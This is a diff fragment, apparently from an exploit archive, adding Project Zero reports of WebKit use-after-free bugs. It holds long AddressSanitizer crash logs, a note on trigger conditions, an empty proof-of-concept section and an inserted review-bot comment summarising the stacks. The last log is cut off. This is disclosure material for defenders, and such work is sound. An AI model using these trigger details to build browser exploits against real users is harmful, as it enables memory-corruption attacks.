(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4675c) + #35 0x11035e523 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b6523) + #36 0x1108e25d0 in WebCore::HTMLDocumentParser::prepareToStopParsing() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a5d0) + #37 0x1103ff693 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x857693) + #38 0x1103c0736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #39 0x10fe3c047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #40 0x10fe34df1 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #41 0x11290c661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #42 0x10140243b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #43 0x1014056d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #44 0x101404bc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #45 0x100bf6117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #46 0x1009d5695 in 
IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + #47 0x1009dea48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48) + #48 0x108b248e3 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d228e3) + #49 0x108b251b1 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d231b1) + #50 0x7fffd52af320 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa7320) + #51 0x7fffd529021c in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8821c) + #52 0x7fffd528f715 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87715) + #53 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #54 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #55 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #56 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #57 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #58 0x7fffd35047ed in -[NSApplication(NSEvent) 
_nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #59 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #60 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #61 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #62 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #63 0x1008d656c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #64 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x607000149b24 is located 20 bytes inside of 72-byte region [0x607000149b10,0x607000149b58) +freed by thread T0 here: + #0 0x103b3c294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) + #1 0x108b74650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650) + #2 0x10ff7685f in WebCore::ContainerNode::removeChildren() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3ce85f) + #3 0x111d1b663 in WebCore::replaceChildrenWithFragment(WebCore::ContainerNode&, WTF::Ref&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2173663) + #4 0x1104ff36b in WebCore::Element::setInnerHTML(WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x95736b) + #5 0x1111ca534 in WebCore::setJSElementInnerHTMLSetter(JSC::ExecState&, 
WebCore::JSElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1622534) + #6 0x1111bbca7 in bool WebCore::IDLAttribute::set<&(WebCore::setJSElementInnerHTMLSetter(JSC::ExecState&, WebCore::JSElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1613ca7) + #7 0x1077b0e48 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aee48) + #8 0x1077b0f77 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9aef77) + #9 0x1082b5008 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x14b3008) + #10 0x10848b655 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1689655) + #11 0x1084a94f4 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a74f4) + #12 0x1084ace49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49) + #13 0x1084a5f6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f) + #14 0x108109847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847) + #15 0x10808a88a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a) + #16 0x1076a3731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731) + #17 0x1076a39a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2) + #18 0x1076a3d13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13) + #19 0x110de6615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615) + #20 0x1111f96cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd) + #21 0x110565010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector, 1ul, WTF::CrashOnOverflow, 16ul>) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010) + #22 0x110564ae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0) + #23 0x110442051 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89a051) + #24 0x110451c0f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8a9c0f) + #25 0x110344b0f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x79cb0f) + #26 0x11033ebad in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x796bad) + #27 0x1106f13ed in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb493ed) + #28 0x1106ee75c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb4675c) + #29 0x11035e523 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7b6523) + +previously allocated by thread T0 here: + #0 0x103b3bd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c) + #1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281) + #2 0x108b74ad4 in bmalloc::DebugHeap::malloc(unsigned long) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4) + #3 0x108b72d6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d) + #4 0x108af9247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247) + #5 0x108af863a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a) + #6 0x10fcee648 in WebCore::Node::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x146648) + #7 0x112acdaad in WebCore::Text::create(WebCore::Document&, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f25aad) + #8 0x112acf4f8 in WebCore::Text::createWithLengthLimit(WebCore::Document&, WTF::String const&, unsigned int, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f274f8) + #9 0x1108b911b in WebCore::HTMLConstructionSite::insertTextNode(WTF::String const&, WebCore::WhitespaceMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd1111b) + #10 0x110a2521f in WebCore::HTMLTreeBuilder::processCharacterBufferForInBody(WebCore::HTMLTreeBuilder::ExternalCharacterTokenBuffer&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe7d21f) + #11 0x110a1f223 in WebCore::HTMLTreeBuilder::processCharacterBuffer(WebCore::HTMLTreeBuilder::ExternalCharacterTokenBuffer&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe77223) + #12 0x110a1e083 in 
WebCore::HTMLTreeBuilder::processCharacter(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe76083) + #13 0x110a1ad0e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xe72d0e) + #14 0x1108e3c8a in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3bc8a) + #15 0x1108e3849 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3b849) + #16 0x1108e29c2 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3a9c2) + #17 0x1108e44e8 in WebCore::HTMLDocumentParser::append(WTF::RefPtr&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd3c4e8) + #18 0x1102c2531 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x71a531) + #19 0x1103ff63d in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x85763d) + #20 0x1103c0736 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x818736) + #21 0x10fe3c047 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x294047) + #22 0x10fe34df1 in 
WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28cdf1) + #23 0x11290c661 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d64661) + #24 0x10140243b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb1343b) + #25 0x1014056d9 in void IPC::handleMessage(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb166d9) + #26 0x101404bc9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xb15bc9) + #27 0x100bf6117 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x307117) + #28 0x1009d5695 in IPC::Connection::dispatchMessage(std::__1::unique_ptr >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe6695) + #29 0x1009dea48 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xefa48) + +SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xa029) in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const +Shadow bytes around the buggy address: + 0x1c0e00029310: fd fd fd fd fd fd fd fa fa fa fa fa 00 00 00 00 + 0x1c0e00029320: 00 00 00 00 00 
fa fa fa fa fa fd fd fd fd fd fd + 0x1c0e00029330: fd fd fd fd fa fa fa fa 00 00 00 00 00 00 00 00 + 0x1c0e00029340: 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 00 00 + 0x1c0e00029350: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 fa fa +=>0x1c0e00029360: fa fa fd fd[fd]fd fd fd fd fd fd fa fa fa fa fa + 0x1c0e00029370: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 + 0x1c0e00029380: 00 00 00 00 00 00 00 fa fa fa fa fa fd fd fd fd + 0x1c0e00029390: fd fd fd fd fd fa fa fa fa fa fd fd fd fd fd fd + 0x1c0e000293a0: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fd + 0x1c0e000293b0: fd fd fa fa fa fa fd fd fd fd fd fd fd fd fd fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==29700==ABORTING +*/ \ No newline at end of file diff --git a/platforms/multiple/dos/43169.js b/platforms/multiple/dos/43169.js new file mode 100644 index 000000000..803c85084 --- /dev/null +++ b/platforms/multiple/dos/43169.js 
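Review bot: this hunk ends with `\ No newline at end of file` right after the closing `*/`; add the trailing newline so the entry diffs cleanly. It is also worth a sentence in the entry header summarising what the three ASan stacks in this hunk show, since a reader otherwise has to walk sixty-odd frames: the freed object is a Text node the parser created under `DocumentWriter::end()` (`HTMLConstructionSite::insertTextNode` → `Text::create`); it is freed when a load handler assigns `innerHTML` (`Element::setInnerHTML` → `replaceChildrenWithFragment` → `ContainerNode::removeChildren`), that handler having been dispatched synchronously via `Document::finishedParsing` → `FrameLoader::finishedParsing` → `FrameLoader::checkCompleted` → `Document::implicitClose` → `DOMWindow::dispatchLoadEvent`; and the use is `WebCore::Node::getFlag` reached from the same `DocumentWriter::end()` call (frame #37 of the read stack) once control returns from the load handler.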
@@ -0,0 +1,164 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1347 + +There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. + +Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default. + +PoC: + +================================================================= +*/ + + + + + + +++ +
+ + + +/* +================================================================= + +ASan log: + +================================================================= +==30369==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000346940 at pc 0x000113012178 bp 0x7fff563cac80 sp 0x7fff563cac78 +READ of size 8 at 0x603000346940 thread T0 +==30369==WARNING: invalid path to external symbolizer! +==30369==WARNING: Failed to use and restart external symbolizer! + #0 0x113012177 in WTF::ListHashSetConstIterator >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) + #1 0x112ff326d in WTF::ListHashSetIterator >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d426d) + #2 0x113007cf2 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cf2) + #3 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242) + #4 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74) + #5 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53) + #6 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de) + #7 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439) + #8 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80) + #9 0x7fffd528f113 in CFRunLoopRunSpecific 
(/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113) + #10 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb) + #11 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0) + #12 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25) + #13 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53) + #14 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed) + #15 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da) + #16 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d) + #17 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6) + #18 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3) + #19 0x10983356c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c) + #20 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234) + +0x603000346940 is located 16 bytes inside of 24-byte region [0x603000346930,0x603000346948) +freed by thread T0 here: + #0 0x10ca9c294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294) + #1 0x11ffee650 in 
bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650) + #2 0x11300fccb in WTF::ListHashSet >::deleteAllNodes() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f0ccb) + #3 0x113007edd in WTF::ListHashSet >::clear() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8edd) + #4 0x113007d30 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8d30) + #5 0x1139a3d4a in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb84d4a) + #6 0x1135afb10 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x790b10) + #7 0x1135b6542 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x797542) + #8 0x1137764b1 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9574b1) + #9 0x112e437cc in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x247cc) + #10 0x112e47a63 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a63) + #11 0x112e47dce in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28dce) + #12 0x112e40a59 in 
